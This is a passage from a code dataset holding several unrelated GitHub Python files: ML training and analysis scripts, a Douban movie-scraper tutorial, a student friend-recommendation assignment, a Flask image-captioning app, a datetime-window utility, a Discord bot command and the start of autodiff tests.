most of the optimization is just handled by sklearn\n# all that matters is lag and window\nconfig_updates = {\n 'architecture': \"GRU\",\n 'readout': \"linear\",\n 'optmzr': \"Adam\",\n 'init': \"blockortho\",\n #'parity': \"rotate\",\n #'t_distrib': MyDistrib(0.25*math.pi, 0.01),\n 'path': \"models/216/final_state_dict.pt\",\n\n 'dataset': \"JSB_Chorales\",\n\n 'low_off_notes': 27,\n 'high_off_notes': 75,\n\n 'num_epochs': 200,\n #'hps_epochs': 100,\n 'hidden_size': 120,\n 'scale': 0.01,\n\n #'lag': 1,\n #'window': 1,\n\n 'decay': 0.98,\n 'lr': 0.00316,\n 'regularization': 0.0,\n\n 'do_hpsearch': False,\n 'decays': [1.0],\n #'regularizations': [0.0001],\n #'learning_rates': 10**np.linspace(-1, -3, num=5),\n\n 'save_init_model': True,\n 'save_final_model': True\n }\n\n\nif __name__ == \"__main__\":\n\n base_dir = os.getcwd()\n\n if debug_mode:\n\n # run the experiment without an observer\n ex.run(config_updates={**config_updates})\n result = ex.current_run.result\n\n else:\n\n # store in local directory for now\n ex.observers.append(FileStorageObserver(base_dir + '/models'))\n\n # run the experiment after adding observer\n ex.run(config_updates={**config_updates})\n result = ex.current_run.result","repo_name":"catniplab/ML-music-analysis","sub_path":"train_example.py","file_name":"train_example.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19293663237","text":"import re\nfrom urllib.request import urlopen\n\n\ndef get_page(url):\n response = urlopen(url)\n return response.read().decode(\"utf-8\")\n\n\ndef parse_page(s):\n ret = re.findall(\n '
.*?
.*?(?P\\d+).*?(?P.*?)</span>'\n '.*?<span class=\"rating_num\" .*?>(?P<rating_num>.*?)</span>.*?<span>(?P<comment_num>.*?)评价</span>', s, re.S)\n return ret\n\n\ndef main(num):\n url = 'https://movie.douban.com/top250?start=%s&filter=' % num\n response_html = get_page(url)\n ret = parse_page(response_html)\n return ret\n\n\ncount = 0\nfor i in range(5):\n ret = main(count)\n # 将爬取到的电影排名, 写入到文件里\n with open(\"movie.txt\", \"a\", encoding=\"utf-8\") as f1:\n f1.write(str(ret))\n count += 25\n\n\n","repo_name":"fengzongming/python_practice","sub_path":"day18_re模块/demo_04_爬虫的例子.py","file_name":"demo_04_爬虫的例子.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19381050513","text":"#Family name: Tara\n# Student number: 300018569\n# Course: IT1 1120 \n# Assignment Number: 5\nclass Person:\n\n # YOUR CODE GOES HERE\n def __init__(self, uid, name, friends = []):\n \"\"\"(Person, int, string, list of int) -> None\"\"\"\n self.id = uid\n self.name = name\n self.friends = friends[:]\n\n def __repr__(self):\n \"\"\"(Person) -> str\"\"\"\n return \"Person({},{},{})\".format(self.id, self.name, self.friends)\n def get_friends(self):\n \"\"\"(Person) -> list\"\"\"\n return self.friends\n def add_friend(self, uid):\n \"\"\"(Person, int) -> None\"\"\"\n self.friends.append(uid)\nclass Network:\n # YOUR CODE GOES HERE\n def __init__(self, name_file, id_file):\n \"\"\"(Network, str, str) -> None\"\"\"\n self.network = []\n n_f = open(name_file).read().splitlines()\n friends = open(id_file).read().splitlines()\n\n for query in n_f:\n id_name = query.split(\"\\t\")\n self.network.append(Person(int(id_name[0]), id_name[1]))\n\n del friends[0]\n \n \n for i in range(len(friends)):\n nums = friends[i].split(\" \")\n curr_id = int(nums[0])\n connection = int(nums[1])\n friends[i] = [curr_id,connection]\n\n\n for i in range(len(friends)): \n curr_user = friends[i][0]\n connection = friends[i][1]\n id_user = self.search_id(curr_user)\n id_conn = self.search_id(connection)\n self.network[id_user].add_friend(connection)\n self.network[id_conn].add_friend(curr_user)\n\n\n def __repr__(self):\n \"\"\"(Network) -> str\"\"\"\n return \"Network({})\".format(self.network)\n\n\n def __len__(self):\n \"\"\"(Network) -> int\"\"\"\n return len(self.network)\n\n\n def recommend(self, user):\n \"\"\"(Network, int)->int or None\"\"\"\n user_friends = self.network[self.search_id(user)].get_friends()\n user_friends = set(user_friends)\n candidates = {p.id for p in self.network}\n candidates = candidates - user_friends\n candidates = candidates - {user}\n recommended = [0]\n \n for candidate in candidates:\n num = len(self.getCommonFriends(user, candidate))\n if num > 0:\n if len(recommended) != 2:\n recommended[0] = candidate\n recommended.append(num)\n if num > recommended[1] or num == recommended[1] and recommended[0] > candidate:\n recommended.pop()\n recommended.pop()\n recommended.append(candidate)\n recommended.append(num)\n\n \n if len(recommended) == 2:\n return recommended[0]\n\n\n def getCommonFriends(self, user1, user2):\n \"\"\"(Network, int, int) -> list\"\"\"\n common=[]\n \n friends_of_user1 = self.network[self.search_id(user1)].get_friends()\n friends_of_user2 = self.network[self.search_id(user2)].get_friends()\n index_user1 = 0\n index_user2 = 0\n\n while index_user1 < len(friends_of_user1) and index_user2 < len(friends_of_user2):\n if friends_of_user1[index_user1] < friends_of_user2[index_user2]:\n index_user1 += 1\n elif friends_of_user2[index_user2] < friends_of_user1[index_user1]:\n index_user2 += 1\n else:\n common.append(friends_of_user1[index_user1])\n index_user1 += 1\n index_user2 += 1\n\n return common\n\n def get_uid(self):\n \"\"\"(Network)->int\"\"\"\n\n index = -1\n \n while index == -1:\n \n try:\n uid = int(input(\"Enter an integer for a user ID: \").strip())\n index = self.search_id(uid)\n \n if index == -1:\n print(\"That user ID does not exist. Try again\")\n \n except ValueError:\n print(\"That was not an integer. Please try again.\")\n \n return uid\n\n def search_id(self, value):\n \"\"\"(Network, int) -> int\"\"\"\n \n end = len(self.network) -1\n begin = 0\n \n while end - begin > 1:\n mid = (end+begin)//2\n key = self.network[mid].id\n if key < value:\n begin = mid + 1\n elif key > value:\n end = mid - 1\n else: #foundit\n return mid\n if self.network[begin].id == value:\n return begin\n elif self.network[end].id == value:\n return end\n \n return -1 \n\n \n \n\n\ndef get_int():\n '''None->int or None'''\n num = None\n try:\n num=int(input(\"Enter an integer for a user ID:\").strip())\n except ValueError:\n print(\"That was not an integer. Please try again.\")\n return num \n\ndef is_valid_file_name():\n '''None->str or None'''\n file_name = None\n try:\n file_name=input(\"Enter the name of the file: \").strip()\n f=open(file_name)\n f.close()\n except FileNotFoundError:\n print(\"There is no file with that name. Try again.\")\n file_name=None\n return file_name \n\ndef get_file_name():\n '''()->str'''\n file_name=None\n while file_name==None:\n file_name=is_valid_file_name()\n return file_name\n \n \n\n##############################\n# main\n##############################\nprint(\"Let's get first file that contains IDs and names:\")\nfile_name1=get_file_name()\nprint(\"Let's get the 2nd file that contains pairs of friends as in Assignment 4\")\nfile_name2=get_file_name()\n\n\nnet=Network(file_name1,file_name2)\nprint(\"Here are all the people in the network, if the network has at most 20 users:\")\nif len(net)<=20:\n print(net)\n\n\nprint(\"\\nLet's recommend a friend for a user you specify.\")\nuid=net.get_uid()\nrec=net.recommend(uid)\nif rec==None:\n print(\"We have nobody to recommend for user with ID\", uid, \"since he/she is dominating in their connected component\")\nelse:\n print(\"For user with ID\", uid,\"we recommend the user with ID\",rec)\n print(\"That is because users\", uid, \"and\",rec, \"have\", len(net.getCommonFriends(uid,rec)), \"common friends and\")\n print(\"user\", uid, \"does not have more common friends with anyone else.\")\n \n\nprint(\"\\nFinally, you showed interest in knowing common friends of some pairs of users.\")\nprint(\"About 1st user ...\")\nuid1=net.get_uid()\nprint(\"About 2st user ...\")\nuid2=net.get_uid()\nprint(\"Here is the list of common friends of\", uid1, \"and\", uid2)\ncommon=net.getCommonFriends(uid1,uid2)\nfor item in common:\n print(item, end=\" \")\n\n\n\n \n","repo_name":"SahilTara/ITI1120","sub_path":"ASSIGNMENTS/assignment5-students/a5_bonus_300018569.py","file_name":"a5_bonus_300018569.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18781169749","text":"from unicodedata import bidirectional\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.autograd import Variable \nfrom LSTM_train import LSTM\n\ndevice = 'cuda:0'\nval_set = np.load('val.npy', allow_pickle=True)\ntrain_set = np.load('train.npy', allow_pickle=True)\nend_token = torch.zeros([1, 20])\n\nmodel = LSTM(20, 60, 4).to(device)\nmodel.load_state_dict(torch.load('lstm.pth'))\nlr = .001\nepochs = 100\ncriterion = nn.CrossEntropyLoss()\n\n# Getting the training set 3-gram, go through the training set and get the values of a window of 3 amino acids\n# the indices in sequence count correspond to the sequence, so add one if found to the correct index\nsequence_count = torch.zeros([20, 20, 20])\nfor i in range(len(train_set)):\n for j in range(len(train_set[i])-3):\n index_1 = np.argmax(train_set[i][j], axis=0)\n index_2 = np.argmax(train_set[i][j+1], axis=0)\n index_3 = np.argmax(train_set[i][j+2], axis=0)\n\n sequence_count[index_1][index_2][index_3] += 1\n\n# divide by the training set to get probs\nsequence_count /= len(train_set)\nsequence_count = sequence_count.flatten()\n\nplt.plot(sequence_count)\nplt.show()\n\n# Get the model 3-gram, generate a sequence while taking the probabilities of p(a)p(b|a)p(c|a,b)\nmodel_probs = torch.empty([20, 20, 20])\nwith torch.no_grad():\n one_hot = torch.zeros([1, 100, 20])\n for i in range(20):\n for j in range(20):\n for k in range(20):\n # first input, all zeros to get prob of first term (ex. A)\n one_hot = torch.zeros([1, 100, 20]).to(device)\n pred = model(one_hot)\n pred = pred[-1]\n pred = nn.functional.softmax(pred)\n first_prob = pred[i]\n\n # second input, add the current term to the sequence to generate next\n # probability for index j, ex. (A, [end])\n one_hot[0][98][i] += 1\n pred = model(one_hot)\n pred = pred[-1]\n pred = nn.functional.softmax(pred)\n second_prob = pred[j]\n\n # third input, create a vector of the first and second indices, ex. (A, A, [end])\n # to get the probability for index k\n one_hot = torch.zeros([1, 100, 20]).to(device)\n one_hot[0][98][j] += 1\n one_hot[0][97][i] += 1\n\n pred = model(one_hot)\n pred = pred[-1]\n pred = nn.functional.softmax(pred)\n third_prob = pred[k]\n\n model_probs[i][j][k] = first_prob * second_prob * third_prob\n\nmodel_probs = torch.flatten(model_probs)\n\nplt.plot(model_probs)\nplt.show()\n\nsequence_count = torch.Tensor(sequence_count)\ndistance = torch.linalg.norm(sequence_count - model_probs)\n\nprint(\"Distance: {}\".format(distance))\n\ndifference = torch.abs(sequence_count - model_probs)\ndifference = torch.sort(difference)\n\nfurthest_elements = difference[0][-20:].numpy()\nfurthest_elements_index = difference[1][-20:].numpy()\n\nprint('furthest probs: {}'.format(furthest_elements))\n\nclosest_elements = difference[0][:20].numpy()\nclosest_elements_index = difference[1][:20].numpy()\n\nprint(\"closest probs: {}\".format(closest_elements))\n\namino_acids = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',\n 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\nencodings = np.eye(len(amino_acids))\n\namino_acid_encodings = {}\nfor i, amino_acid in enumerate(amino_acids):\n amino_acid_encodings[i] = amino_acid\n\nfurthest_sequences = []\nfor index in furthest_elements_index:\n amino_acid = ''\n cur_index = np.unravel_index(index, (20, 20, 20))\n amino_acid += amino_acid_encodings[cur_index[0]]\n amino_acid += amino_acid_encodings[cur_index[1]]\n amino_acid += amino_acid_encodings[cur_index[2]]\n furthest_sequences.append(amino_acid)\n\nclosest_sequences = []\nfor index in closest_elements_index:\n amino_acid = ''\n cur_index = np.unravel_index(index, (20, 20, 20))\n amino_acid += amino_acid_encodings[cur_index[0]]\n amino_acid += amino_acid_encodings[cur_index[1]]\n amino_acid += amino_acid_encodings[cur_index[2]]\n closest_sequences.append(amino_acid)\n\nprint('furthest: {}'.format(furthest_sequences))\nprint('closest: {}'.format(closest_sequences))","repo_name":"JohnLazzari/LSTM-Amino-Acids","sub_path":"3_gram.py","file_name":"3_gram.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19103996612","text":"import flet as ft\nfrom flet import UserControl, Theme, Page\nimport assets.colors\nimport assets.fonts.config\n\n\nclass PageConfig:\n \"\"\"\n Configura as propriedades da página.\n \"\"\"\n\n def __init__(self, page: Page):\n self.page = page\n\n # Define o título da página\n self.page.title = \"Estacao Meteorologica\"\n\n # Define a largura e altura da janela\n self.page.window_width = 385.0\n self.page.window_height = 704.0\n\n # Habilita a barra de rolagem da página\n self.page.scroll = \"auto\"\n # Define que a janela deve ficar sempre no topo\n self.page.window_always_on_top = True\n # Define a posição horizontal do conteúdo na janela\n self.page.horizontal_alignment = ft.CrossAxisAlignment.CENTER\n\n # Define o modo e o tema da página\n self.page.theme_mode = \"light\"\n self.page.theme = ft.theme.Theme(\n color_scheme_seed=assets.colors.BACKGROUND2, use_material3=True\n )\n # Atualiza a página\n self.page.fonts = assets.fonts.config.load()\n self.page.update()\n","repo_name":"maiconrp/estacao-meteorologica","sub_path":"code/app/config/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"pt","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"42507779397","text":"import imghdr\r\nimport os\r\nimport glob\r\nfrom flask import Flask, render_template, request, redirect, url_for, abort, \\\r\n send_from_directory, jsonify\r\nfrom werkzeug.utils import secure_filename\r\nimport uuid\r\n# from waitress import serve\r\n\r\n# Image Caption module\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom img2_caption import load_models, predict\r\nfrom PIL import Image\r\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\r\n\r\n# GPT3 Module\r\nfrom gpt3 import generate_story, create_paragraphing_html, gpt3_init\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['MAX_CONTENT_LENGTH'] = 2 * 1024 * 1024\r\napp.config['UPLOAD_EXTENSIONS'] = ['.jpg', '.png', '.jpeg']\r\napp.config['UPLOAD_PATH'] = 'static/uploads/'\r\napp.config['PLOT_PATH'] = 'static/plot/'\r\n\r\n# Load img_caption model\r\nimage_features_extract_model, tokenizer, encoder, decoder = load_models()\r\nresult_list = [] # init empty result list\r\nlast_story = \"\"\r\n\r\n# Load GPT3 model\r\ngpt3_init()\r\n\r\n\r\ndef plot_attention(image, result, attention_plot):\r\n temp_image = np.array(Image.open(image))\r\n\r\n fig = plt.figure(figsize=(10, 10))\r\n\r\n # https://stackoverflow.com/questions/12319796/dynamically-add-create-subplots-in-matplotlib\r\n Tot = len(result)\r\n Cols = 3\r\n\r\n # Compute Rows required\r\n Rows = Tot // Cols\r\n Rows += Tot % Cols\r\n\r\n # Create a Position index\r\n Position = range(1, Tot + 1)\r\n\r\n for l in range(Tot):\r\n temp_att = np.resize(attention_plot[l], (8, 8))\r\n ax = fig.add_subplot(Rows, Cols, Position[l])\r\n ax.set_title(result[l], fontsize=30)\r\n img = ax.imshow(temp_image)\r\n ax.imshow(temp_att, cmap='gray', alpha=0.6, extent=img.get_extent())\r\n\r\n plt.tight_layout()\r\n return fig\r\n\r\n\r\ndef validate_image(stream):\r\n\r\n header = stream.read(512)\r\n stream.seek(0)\r\n format = imghdr.what(None, header)\r\n if not format:\r\n return None\r\n return '.' + (format if format != 'jpeg' else 'jpg')\r\n\r\n\r\ndef del_dir_files(files_path):\r\n\r\n existing_files = os.path.join(files_path, '*')\r\n file_to_delete = glob.glob(existing_files)\r\n for i in file_to_delete:\r\n os.remove(i)\r\n\r\n\r\n@app.errorhandler(413)\r\ndef too_large(e):\r\n \r\n return \"File is too large\", 413\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n\r\n result_list[:] = [] # clear result list\r\n\r\n # Cleanup all the image files in static/uploads.\r\n del_dir_files(app.config['UPLOAD_PATH'])\r\n del_dir_files(app.config['PLOT_PATH'])\r\n \r\n\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef upload_files():\r\n \r\n uploaded_file = request.files['file']\r\n filename = secure_filename(uploaded_file.filename)\r\n if filename != '':\r\n file_ext = os.path.splitext(filename)[1]\r\n if file_ext not in app.config['UPLOAD_EXTENSIONS'] or \\\r\n file_ext != validate_image(uploaded_file.stream):\r\n return \"Invalid image\", 400\r\n uploaded_file.save(os.path.join(app.config['UPLOAD_PATH'], filename))\r\n\r\n return '', 204\r\n\r\n\r\n@app.route('/image_caption', methods=[\"GET\", \"POST\"])\r\ndef image_caption():\r\n \r\n image_names = os.listdir(app.config['UPLOAD_PATH'])\r\n\r\n caption_image_list = []\r\n plot_image_name = []\r\n\r\n for i in image_names:\r\n result, attention_plot = predict(os.path.join(\r\n app.config['UPLOAD_PATH'], i), image_features_extract_model,\r\n tokenizer, encoder, decoder)\r\n\r\n # generate random filename\r\n filename = str(uuid.uuid4())\r\n\r\n fig = plot_attention(os.path.join(\r\n app.config['UPLOAD_PATH'], i), result, attention_plot)\r\n fig.savefig(app.config['PLOT_PATH'] + filename + '.png', bbox_inches='tight',\r\n pad_inches=0)\r\n\r\n plot_image_name.append(filename + '.png')\r\n del result[-1] # remove the last element \"<end>\"\r\n result_list.append(result)\r\n caption = ' '.join(result).capitalize()\r\n caption_image_list.append(caption)\r\n\r\n return jsonify(caption_image_list=caption_image_list, image_names=image_names,\r\n plot_image_name=plot_image_name)\r\n\r\n\r\n@app.route('/display_image', methods=[\"GET\", \"POST\"])\r\ndef display_image():\r\n \r\n image_names = os.listdir(app.config['UPLOAD_PATH'])\r\n\r\n caption_list = []\r\n text_list = [\"\"]\r\n last_story = \"\"\r\n\r\n j = 0\r\n\r\n for i in image_names:\r\n \r\n\r\n result = result_list[j]\r\n caption_title = f\"'{' '.join(result[:]).capitalize()}'\"\r\n caption = ' '.join(result)\r\n # caption = text_list[-1] + \"\\nprompt: \" + caption + \"\\nstory:\\n \"\r\n # caption = last_story + \" \" + caption\r\n generate_txt = generate_story(caption, model)\r\n generate_txt = create_paragraphing_html(generate_txt)\r\n caption_list.append(caption_title)\r\n text_list.append(generate_txt)\r\n last_story = generate_txt[-50:]\r\n \r\n\r\n j += 1\r\n text_list = text_list[1:]\r\n\r\n return jsonify(caption_list=caption_list, image_names=image_names,\r\n text_list=text_list)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=8000)\r\n \r\n","repo_name":"suvivarshney/SnapStory-An-image-to-text-story-generator-using-GPT3","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16353415122","text":"from typing import Union\nfrom datetime import datetime, timedelta\n\nfrom dateutil.relativedelta import relativedelta\nimport pytz\n\n\nclass DatetimeWindow:\n '''\n Make a window between two datetimes, and easily create new windows using\n the first window as a reference point.\n '''\n default_timezone = pytz.UTC\n\n def __init__(\n self, date1: Union[datetime, relativedelta], date2: datetime=None\n ) -> None:\n date2 = self.now_if_none(date2)\n\n if isinstance(date1, relativedelta):\n date1 = date2 + date1\n\n date1 = self.ensure_timezone(date1)\n date2 = self.ensure_timezone(date2)\n\n self.start = min([date1, date2])\n self.end = max([date1, date2])\n\n self.duration = relativedelta(self.end, self.start)\n\n def __repr__(self) -> str:\n return '{}({}, {})'.format(\n self.__class__.__name__,\n repr(self.start),\n repr(self.end)\n )\n\n def __str__(self) -> str:\n return str({\n 'start': self.start,\n 'end': self.end,\n 'duration': self.duration,\n })\n\n @staticmethod\n def now_if_none(dt: Union[None, datetime]\n ) -> Union[datetime, relativedelta]:\n if dt is None:\n return datetime.now(DatetimeWindow.default_timezone)\n else:\n return dt\n\n @staticmethod\n def ensure_timezone(dt: datetime=None, tzinfo: 'pytz'=None) -> datetime:\n if tzinfo is None:\n tzinfo = DatetimeWindow.default_timezone\n\n dt = DatetimeWindow.now_if_none(dt)\n if dt.tzinfo is None:\n dt = dt.replace(tzinfo=tzinfo)\n return dt\n\n @staticmethod\n def create_explicit(\n start: datetime=None, end: datetime=None\n ) -> 'DatetimeWindow':\n start = DatetimeWindow.now_if_none(start)\n end = DatetimeWindow.now_if_none(end)\n\n if start > end:\n raise ValueError(('Cannot have a start after the end'\n '({},{})').format(start, end))\n return DatetimeWindow(start, end)\n\n def start_add(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Add a relativedelta to the start of the DatetimeWindow. Uses the\n relativedelta args, e.g. dtw.start_add(days=1)\n Can be negative, e.g. dtw.start_add(days=-1)\n '''\n return self.create_explicit(\n start=self.start + relativedelta(**relativedelta_kwargs),\n end=self.end,\n )\n\n def end_add(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Add a relativedelta to the end of the DatetimeWindow. Uses the\n relativedelta args, e.g. dtw.end_add(days=1)\n Can be negative, e.g. dtw.end_add(days=-1)\n '''\n return self.create_explicit(\n start=self.start,\n end=self.end + relativedelta(**relativedelta_kwargs),\n )\n\n def window_add(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Add a relativedelta to both the start and end of the DatetimeWindow.\n Uses the relativedelta args, e.g. dtw.window_add(days=1)\n Can be negative, e.g. dtw.window_add(days=-1)\n '''\n return self.create_explicit(\n start=self.start + relativedelta(**relativedelta_kwargs),\n end=self.end + relativedelta(**relativedelta_kwargs),\n )\n\n def window_expand(self, **relativedelta_kwargs) -> 'DatetimeWindow':\n '''\n Symmetrically expand the DatetimeWindow by relativedelta at both the\n start and the end.\n Uses the relativedelta args, e.g. dtw.window_expand(days=1)\n Can be negative, e.g. dtw.window_expand(days=-1)\n '''\n return self.create_explicit(\n start=self.start - relativedelta(**relativedelta_kwargs),\n end=self.end + relativedelta(**relativedelta_kwargs),\n )\n\n def duration_days(self) -> float:\n '''\n Calculates the duration of the DatetimeWindow using only `days` as the\n unit, to one-second precision. `days` is a special case, because\n `dateutil.relativedelta` rounds `days` to `months`, and there's no\n consistent number of `days` in a `month` (or a `year`).\n '''\n return ((self.end - self.start).total_seconds()\n / timedelta(days=1).total_seconds())\n\n '''\n Comparisons\n '''\n @staticmethod\n def is_positive_relativedelta(rd: relativedelta) -> bool:\n '''\n Can't compare relativedeltas directly, so as a hack, add it to a\n datetime and compare those.\n '''\n now = datetime.now()\n now_delta = now + rd\n return now_delta >= now\n\n def starts_after(self, dt: datetime) -> bool:\n '''\n Does the DatetimeWindow start after the specified datetime?\n '''\n if not isinstance(dt, datetime):\n raise ValueError('Must compare a datetime to the DatetimeWindow')\n return dt < self.start\n\n def contains(self, dt: Union[datetime, 'DatetimeWindow']) -> bool:\n '''\n Does the DatetimeWindow contain the\n specified datetime or DatetimeWindow?\n '''\n if isinstance(dt, datetime):\n dtw = DatetimeWindow(dt, dt)\n elif isinstance(dt, DatetimeWindow):\n dtw = dt\n else:\n raise TypeError('Must compare a datetime or DatetimeWindow')\n return dtw.start >= self.start and dtw.end <= self.end\n\n def ends_after(self, dt: datetime) -> bool:\n '''\n Does the DatetimeWindow end after the specified datetime?\n '''\n if not isinstance(dt, datetime):\n raise ValueError('Must compare a datetime to the DatetimeWindow')\n return dt < self.end\n\n def overlaps(self, dtw: 'DatetimeWindow') -> Union['DatetimeWindow', None]:\n '''\n Provide a new DatetimeWindow of the overlap, or None if the\n DatetimeWindows don't overlap.\n '''\n if not isinstance(dtw, DatetimeWindow):\n raise TypeError('Must compare a DatetimeWindow')\n\n w_overall = DatetimeWindow(\n min([dtw.start, self.start]), max([dtw.end, self.end]))\n w_end_to_end = DatetimeWindow(\n min([dtw.end, self.end]), max([dtw.end, self.end]))\n w_start_to_start = DatetimeWindow(\n min([dtw.start, self.start]), max([dtw.start, self.start]))\n overlap_duration = (\n w_overall.duration - w_end_to_end.duration\n - w_start_to_start.duration\n )\n\n if not self.is_positive_relativedelta(overlap_duration):\n return None\n else:\n return DatetimeWindow(w_start_to_start.end, w_end_to_end.start)\n","repo_name":"jbryanscott/datetimewindow","sub_path":"datetimewindow/datetimewindow.py","file_name":"datetimewindow.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19816704040","text":"import math\n\nfrom aitemplate.compiler import ops\nfrom aitemplate.frontend import nn, Tensor\n\n\ndef get_shape(x):\n shape = [it.value() for it in x._attrs[\"shape\"]]\n return shape\n\n\ndef get_timestep_embedding(\n timesteps: Tensor,\n embedding_dim: int,\n flip_sin_to_cos: bool = False,\n downscale_freq_shift: float = 1,\n scale: float = 1,\n max_period: int = 10000,\n):\n \"\"\"\n This matches the implementation in Denoising Diffusion Probabilistic Models: Create sinusoidal timestep embeddings.\n\n :param timesteps: a 1-D Tensor of N indices, one per batch element.\n These may be fractional.\n :param embedding_dim: the dimension of the output. :param max_period: controls the minimum frequency of the\n embeddings. :return: an [N x dim] Tensor of positional embeddings.\n \"\"\"\n assert timesteps._rank() == 1, \"Timesteps should be a 1d-array\"\n\n half_dim = embedding_dim // 2\n\n exponent = (-math.log(max_period)) * Tensor(\n shape=[half_dim], dtype=\"float16\", name=\"arange\"\n )\n\n exponent = exponent * (1.0 / (half_dim - downscale_freq_shift))\n\n emb = ops.exp(exponent)\n emb = ops.reshape()(timesteps, [-1, 1]) * ops.reshape()(emb, [1, -1])\n\n # scale embeddings\n emb = scale * emb\n\n # concat sine and cosine embeddings\n if flip_sin_to_cos:\n emb = ops.concatenate()(\n [ops.cos(emb), ops.sin(emb)],\n dim=-1,\n )\n else:\n emb = ops.concatenate()(\n [ops.sin(emb), ops.cos(emb)],\n dim=-1,\n )\n return emb\n\n\nclass TimestepEmbedding(nn.Module):\n def __init__(self, channel: int, time_embed_dim: int, act_fn: str = \"silu\"):\n super().__init__()\n\n self.linear_1 = nn.Linear(channel, time_embed_dim, specialization=\"swish\")\n self.linear_2 = nn.Linear(time_embed_dim, time_embed_dim)\n\n def forward(self, sample):\n sample = self.linear_1(sample)\n sample = self.linear_2(sample)\n return sample\n\n\nclass Timesteps(nn.Module):\n def __init__(\n self, num_channels: int, flip_sin_to_cos: bool, downscale_freq_shift: float\n ):\n super().__init__()\n self.num_channels = num_channels\n self.flip_sin_to_cos = flip_sin_to_cos\n self.downscale_freq_shift = downscale_freq_shift\n\n def forward(self, timesteps):\n t_emb = get_timestep_embedding(\n timesteps,\n self.num_channels,\n flip_sin_to_cos=self.flip_sin_to_cos,\n downscale_freq_shift=self.downscale_freq_shift,\n )\n return t_emb\n","repo_name":"facebookincubator/AITemplate","sub_path":"examples/05_stable_diffusion/src/modeling/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"19765064111","text":"import discord\n\nimport chattrigger\nfrom persistentstorage.persstorage import PersistentStorage\n\n\nclass AddSlowMode(chattrigger.ChatTrigger):\n\n async def run(self, message: discord.Message, trigger: str, client: discord.Client):\n # tag Time\n\n if not message.author.guild_permissions.administrator:\n await message.channel.send(\n \"You do not have the permissions to execute this command. The administrator permission is required.\")\n return\n\n args = message.content.split(\" \")\n\n if not len(args) == 3:\n await message.channel.send(\"Invalid Syntax! The proper syntax is ,asm [@user] [Slow mode seconds]!\")\n return\n\n target_user = message.mentions[0]\n\n per_storage = PersistentStorage(client)\n\n await per_storage.append_data(message.guild.id, \"slowmodelist\", f\".{str(target_user.id)},{args[2]}\")\n await message.channel.send(\"Done.\")\n","repo_name":"98ht24/replywithdotrecodedrecoded","sub_path":"chattriggers/addslowmode.py","file_name":"addslowmode.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11175149088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pytest\nimport collections\nfrom tests.common import arepeat, arange, amap\n\nimport tests.autodiff.fakes as fake\n\nimport tadpole.util as util\nimport tadpole.autodiff.types as at\nimport tadpole.autodiff.nary as nary\n\n\n\n\n###############################################################################\n### ###\n### Nary operator: decorator that converts unary operators into nary ones ###\n### ###\n###############################################################################\n\n\n# --- Nary operator --------------------------------------------------------- #\n\nNaryOpData = collections.namedtuple(\"NaryOpData\", [\n \"nary_op\", \"unary_op\", \"fun\", \"argproxy\", \"adx\", \n \"args\", \"args1\", \"x\", \"x1\", \"out\"\n ]) \n\n\n\n\ndef nary_op_dat(args, adx):\n\n x = args[adx]\n x1 = fake.Node()\n out = fake.Node()\n\n args1 = list(args)\n args1[adx] = x1\n\n unary_op = fake.Op(fake.Fun(x1, x))\n fun = fake.Fun(out, *args1)\n argproxy = fake.ArgProxy(\n insert=fake.Fun(args1, args, x1), \n extract=fake.Fun(x, args)\n ) \n nary_op = nary.NaryOp(unary_op, fun, argproxy)\n\n return NaryOpData(nary_op, unary_op, fun, argproxy, adx, \n args, args1, x, x1, out)\n\n\n\n\n# --- Nary operator creation ------------------------------------------------ #\n\nNaryOpCreatorData = collections.namedtuple(\"NaryOpCreatorData\", [\n \"nary_op\", \"unary_op\", \"fun\", \"argproxy\", \"adx\", \n ]) \n\n\n\ndef nary_op_creator_dat(adx, proxytype):\n\n argproxy = {\n \"SINGULAR\": nary.ArgProxySingular,\n \"PLURAL\": nary.ArgProxyPlural,\n }[proxytype](adx) \n\n def fun(*args): \n return fake.Value()\n\n def unary_op(fun, x):\n return fake.Value()\n\n nary_op = nary.NaryOp(unary_op, fun, argproxy) \n\n return NaryOpCreatorData(nary_op, unary_op, fun, argproxy, adx)\n\n\n\n\n# --- Argument proxy -------------------------------------------------------- #\n\nArgProxyData = collections.namedtuple(\"ArgProxyData\", [\n \"argproxy\", \"adx\", \"x\", \"args\", \"args1\",\n ]) \n\n\n\n\ndef 